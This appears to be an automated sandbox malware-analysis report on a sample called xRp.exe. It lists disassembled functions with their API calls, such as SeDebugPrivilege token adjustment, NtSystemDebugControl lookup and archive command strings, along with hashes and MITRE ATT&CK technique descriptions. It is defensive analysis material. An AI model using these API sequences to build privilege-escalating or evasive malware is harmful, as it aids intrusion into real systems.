Source File: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 8634db8b7c1418a88bcc138067d6f5b5dd2bcca5d3197ff0c845852dd91f513d
Instruction ID: 543a772a15f92b0e31551ea78036128bede4983ec5d0faa841c657658ce0c8c5
Opcode Fuzzy Hash: 8634db8b7c1418a88bcc138067d6f5b5dd2bcca5d3197ff0c845852dd91f513d
Instruction Fuzzy Hash: 6F115E32600649DFCF358F68CC897DE3BA2FF45304F6A8419DD8DAB2A1DA716940CB94

Non-executed Functions

Function 00E3119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,00E313EF), ref: 00E311AB
OpenProcessToken.ADVAPI32(00000000,00000028,00E313EF,?,?,?,?,?,?,00E313EF), ref: 00E311BB
AdjustTokenPrivileges.ADVAPI32(00E313EF,00000000,?,00000010,00000000,00000000), ref: 00E311EB
CloseHandle.KERNEL32(00E313EF), ref: 00E311FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E313EF), ref: 00E31203

Strings

C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E311A5

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
API String ID: 75692138-1450390661
Opcode ID: 862cedec6fa929a64ee7585b9dd25b953e800b8a98e89ff28928fa91f6b578ac
Instruction ID: f77692b0c6c052e98076d619f9585257561900f019adc1bea247a7a4241a8ae1
Opcode Fuzzy Hash: 862cedec6fa929a64ee7585b9dd25b953e800b8a98e89ff28928fa91f6b578ac
Instruction Fuzzy Hash: 7A01D2B590020DEFEB00DFE5C989AAEBFB9FB04305F1045A9E606A2250D7719E489F50

Function 00E3239D Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00E323CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E32464
GetFileSize.KERNEL32(00000000,00000000), ref: 00E32472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00E324A8
memset.MSVCRT ref: 00E324B9
strrchr.MSVCRT ref: 00E324C9
wsprintfA.USER32 ref: 00E324DE
strrchr.MSVCRT ref: 00E324ED
memset.MSVCRT ref: 00E324F2
memset.MSVCRT ref: 00E32505
wsprintfA.USER32 ref: 00E32524
Sleep.KERNEL32(000007D0), ref: 00E32535
Sleep.KERNEL32(000007D0), ref: 00E3255D
memset.MSVCRT ref: 00E3256E
wsprintfA.USER32 ref: 00E32585
memset.MSVCRT ref: 00E325A6
wsprintfA.USER32 ref: 00E325CA
Sleep.KERNEL32(000007D0), ref: 00E325D0
Sleep.KERNEL32(000007D0,?,?), ref: 00E325E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E325FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00E32611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00E32642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00E3265B
SetEndOfFile.KERNEL32 ref: 00E3266D
CloseHandle.KERNEL32(00000000), ref: 00E32676
RemoveDirectoryA.KERNEL32(?), ref: 00E32681

Strings

%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00E325C4
%s%s, xrefs: 00E324D8
%s\, xrefs: 00E3257F
C:\Users\user\AppData\Local\Temp\6b1c0b84.exe, xrefs: 00E32519, 00E325BF
C:\Users\user\AppData\Local\Temp\, xrefs: 00E323B1, 00E323B6, 00E324CD
-ibck, xrefs: 00E325BA
%s X -ibck "%s" "%s\", xrefs: 00E3251E

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\6b1c0b84.exe
API String ID: 2203340711-961484416
Opcode ID: 5fb45a39bef77a70791b692dd2d11b5e0d0be4ae3fb640835f01b02ed99d04f0
Instruction ID: 10217f4d63008d6e244d59a587a80116b0d05f2eb3fc4be9346388fba0f5e4d0
Opcode Fuzzy Hash: 5fb45a39bef77a70791b692dd2d11b5e0d0be4ae3fb640835f01b02ed99d04f0
Instruction Fuzzy Hash: AB818CB1504308AFD7109B65DC8DEABBFECEB88705F00151EFA85B21A0D7749A49CB66

Function 00E3120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00E31400), ref: 00E31226
GetProcAddress.KERNEL32(00000000), ref: 00E3122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00E31400), ref: 00E3123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00E31400), ref: 00E31250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,00E31400), ref: 00E3129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,00E31400), ref: 00E312B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,00E31400), ref: 00E312F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00E31400), ref: 00E3130A

Strings

ntdll.dll, xrefs: 00E31219
ZwQuerySystemInformation, xrefs: 00E31212
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E31262

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-3769353041
Opcode ID: 65031c2166c1ac3be1e3b2e55862e19c9b73a3a2bdfc0931e1c1a29e28ef11a2
Instruction ID: 0d179d30fe4e39fe81b3cc892ea9f3bac9c79d94b99d6c843c792dfe5efbf500
Opcode Fuzzy Hash: 65031c2166c1ac3be1e3b2e55862e19c9b73a3a2bdfc0931e1c1a29e28ef11a2
Instruction Fuzzy Hash: 05212030605351ABD3209B66CC0CFABBEA8FF85B05F11096CF645F6290C370DA48DBA5

Function 00E3189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00E318B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 00E318D3
CloseHandle.KERNEL32(I%), ref: 00E318E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E318F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00E31901
CloseHandle.KERNEL32(?), ref: 00E3190A

Strings

I%, xrefs: 00E318E0

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%
API String ID: 876959470-1881045234
Opcode ID: 1f8945737868556a44bd8cc9fe7d3e73eb0d4432c00e46cfb039485dd204c73c
Instruction ID: db5a4545cda5ee71a525a4fbc0928b1c216b8aa87eb6102675d10882d4b160a8
Opcode Fuzzy Hash: 1f8945737868556a44bd8cc9fe7d3e73eb0d4432c00e46cfb039485dd204c73c
Instruction Fuzzy Hash: C6017C7290112CBFCB21ABA6DC4CDDFBF7DEF85721F104125FA15B51A0D6718A58CAA0

Function 00E32692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00E32873,?,00000002), ref: 00E326A7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00E32873,?,00000002), ref: 00E326B5
lstrlen.KERNEL32(?), ref: 00E326C4
??2@YAPAXI@Z.MSVCRT ref: 00E326CE
lstrcpy.KERNEL32(00000004,?), ref: 00E326E3
lstrcpy.KERNEL32(?,00000004), ref: 00E3271F
??3@YAXPAX@Z.MSVCRT ref: 00E3272D
SetEvent.KERNEL32 ref: 00E3273C

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 56c43fe83739c6dc2a06ed92e02616269bb18364ae36273656b81940e4c6a080
Instruction ID: bf8347366812f8f84e7fe68f7222e850592f1f46f561b1a0a74882bf62973ee2
Opcode Fuzzy Hash: 56c43fe83739c6dc2a06ed92e02616269bb18364ae36273656b81940e4c6a080
Instruction Fuzzy Hash: 86114CB6500118AFCB219F27ED4C85A7FA9FB84721B14901AF694BB260D770A989DF90

Function 00E31B8A Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00E31BCD
rand.MSVCRT ref: 00E31BD8
memset.MSVCRT ref: 00E31C43
memcpy.MSVCRT ref: 00E31C4F
lstrcat.KERNEL32(?,.exe), ref: 00E31C5D

Strings

.exe, xrefs: 00E31C57

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe
API String ID: 122620767-4119554291
Opcode ID: 5cf09c586b3e94189f769afdffb982ac3f5af2a23e859c3ae33d7e93c26cad15
Instruction ID: b1a1c2e1bb09bf172a759ac74fa653988d09f9161f342a3e80d5a5598872eb7a
Opcode Fuzzy Hash: 5cf09c586b3e94189f769afdffb982ac3f5af2a23e859c3ae33d7e93c26cad15
Instruction Fuzzy Hash: 69218E72E44290AED32913366C4CB6ABFC4CFF3715F1560DDF5853B1D2D1641989C260

Function 00E3139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E313BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E313DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E31448

Part of subcall function 00E3119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,00E313EF), ref: 00E311AB
Part of subcall function 00E3119F: OpenProcessToken.ADVAPI32(00000000,00000028,00E313EF,?,?,?,?,?,?,00E313EF), ref: 00E311BB
Part of subcall function 00E3119F: AdjustTokenPrivileges.ADVAPI32(00E313EF,00000000,?,00000010,00000000,00000000), ref: 00E311EB
Part of subcall function 00E3119F: CloseHandle.KERNEL32(00E313EF), ref: 00E311FA
Part of subcall function 00E3119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E313EF), ref: 00E31203

Strings

SeDebugPrivilege, xrefs: 00E313D3
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E313A8

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SeDebugPrivilege
API String ID: 4123949106-2008642442
Opcode ID: 4d190c1f08d217bd3681446957bc7b81113fe143e4ecf1c67edde3ef138dfeb3
Instruction ID: 3d5de04b2bc923393f173833ae217d486d0b96e56ec1c0381b7fdef8a37c2f56
Opcode Fuzzy Hash: 4d190c1f08d217bd3681446957bc7b81113fe143e4ecf1c67edde3ef138dfeb3
Instruction Fuzzy Hash: 23310E71D40209EAEF20EBA6CC49FEEBFB8EB44705F2151ADE515B2141D7709E45CB60

Function 00E31319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00E31334
GetProcAddress.KERNEL32(00000000), ref: 00E3133B
memset.MSVCRT ref: 00E31359

Strings

NtSystemDebugControl, xrefs: 00E3132A
ntdll.dll, xrefs: 00E3132F

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: a5d05ae71079c01347a0f816149fd6ccc7f5d38c96db38119f7b742173fce0f4
Instruction ID: 92ccb78873dbbd8b6ac24d2d273f7e33284d8aab8e3ae06f06e633ebf7f929ea
Opcode Fuzzy Hash: a5d05ae71079c01347a0f816149fd6ccc7f5d38c96db38119f7b742173fce0f4
Instruction Fuzzy Hash: B7016D7160130DAFDB10DFA5AC8DEAFBFA8FB41318F02516AF941B2180E3749649CA51

Function 00E31DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00E31E0B
lstrcpy.KERNEL32(?,00000001), ref: 00E31E1C
strrchr.MSVCRT ref: 00E31E2B
lstrcmpiA.KERNEL32(?,00E34488), ref: 00E31E48
lstrlen.KERNEL32(00E34488), ref: 00E31E53

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 7d95b3de44529586bde69838d22d2276ae4ae3971a7ae11cf6220771a97832fa
Instruction ID: 7e5ce8a4297b1e5fa6207133b8df60f835dd0ede0cf1b8746043c6480d8a08fb
Opcode Fuzzy Hash: 7d95b3de44529586bde69838d22d2276ae4ae3971a7ae11cf6220771a97832fa
Instruction Fuzzy Hash: E601D6B29042196FEB205771EC4DFD67FDCDB04355F0500AAEA45F2090EA75AA88CFA0

Function 00E3185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
srand.MSVCRT ref: 00E31878
rand.MSVCRT ref: 00E31880
srand.MSVCRT ref: 00E31890
rand.MSVCRT ref: 00E31894

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 38c698742775cef850e35479917fd28d9a9d3a1cefbc99858bdbd393823bcaa5
Instruction ID: a3a559b46a8763bf988f271e81f63237da12b5090d39e01e8a7aa9859c73a84a
Opcode Fuzzy Hash: 38c698742775cef850e35479917fd28d9a9d3a1cefbc99858bdbd393823bcaa5
Instruction Fuzzy Hash: D8E01277A1021CBFD704A7BAEC4AD9EBBACDF84161B110566F600E3254E574E9488AB4

Function 00E36014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00E3603C
GetProcAddress.KERNEL32(00000000,00E36064), ref: 00E3604F

Strings

kernel32.dll, xrefs: 00E3603B

Memory Dump Source

Source File: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: e5b4fb661b7672ed94523f2f207a719c61edf7a543d2a4cff428583e627676fb
Instruction ID: 4e8f94c1ff8cd65c531e6b323d3bda8b7d3ce8c047faa71fef1434b71a2f18ed
Opcode Fuzzy Hash: e5b4fb661b7672ed94523f2f207a719c61edf7a543d2a4cff428583e627676fb
Instruction Fuzzy Hash: 45F0F6B15442899FDF708E74CC48BDE3BE4EB45704F50446AEA09DB241CB348605CB24

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

